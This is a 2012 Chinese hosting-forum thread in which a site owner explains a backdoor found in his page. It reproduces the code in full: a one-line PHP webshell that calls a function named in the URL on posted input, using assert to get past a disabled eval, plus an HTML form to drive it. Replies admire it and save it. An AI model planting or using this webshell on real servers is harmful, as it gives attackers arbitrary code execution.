全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
楼主: miniloop
打印 上一主题 下一主题

某人在我一个页面里留下了这个

  [复制链接]
11#
 楼主| 发表于 2012-2-16 16:20:43 | 只看该作者
本帖最后由 miniloop 于 2012-2-16 16:31 编辑

黑阔厉害啊,尼玛查半天终于知道他是怎样搞的了。
由于我装系统的时候就禁用了eval,他不可能用,网上查了半天知道了
assert也可以直接执行php代码。
现在在本机模拟了下。

建一个post.html
  1. <form action = "test.php?page=assert" method = "post">
  2. <input type = "text" name = "item" />
  3. <input type = "submit" value = "运行" />
  4. </form>
复制代码
再建一个test.php
  1. <?php
  2. $_GET['page']($_POST['item']);
  3. ?>
复制代码
这个post.html在任何电脑上运行都可以,只要action的地址是那个test.php.

在输入框里输入: phpinfo();
尼玛 phpinfo就直接出来啦,太可怕了,这可以为所欲为了啊

12#
发表于 2012-2-16 16:22:37 | 只看该作者
很厉害的样子
13#
发表于 2012-2-16 16:24:38 | 只看该作者
这个得收藏。
14#
发表于 2012-2-16 16:31:14 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
15#
发表于 2012-2-16 16:32:07 | 只看该作者
本帖最后由 edear 于 2012-2-16 16:40 编辑

厉害  刚测试了下 确实如此
16#
发表于 2012-2-16 16:41:04 | 只看该作者
额,php语句不过滤掉? 还可以留言出来?
还可以执行?
开玩笑吧。
17#
发表于 2012-2-16 16:41:43 | 只看该作者
都是大黑阔……
18#
发表于 2012-2-16 16:43:20 | 只看该作者
后门 你懂的
19#
发表于 2012-2-16 16:47:59 | 只看该作者
太可怕了
20#
发表于 2012-2-16 19:23:29 | 只看该作者
牛逼..
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-11-7 12:55 , Processed in 0.124541 second(s), 7 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表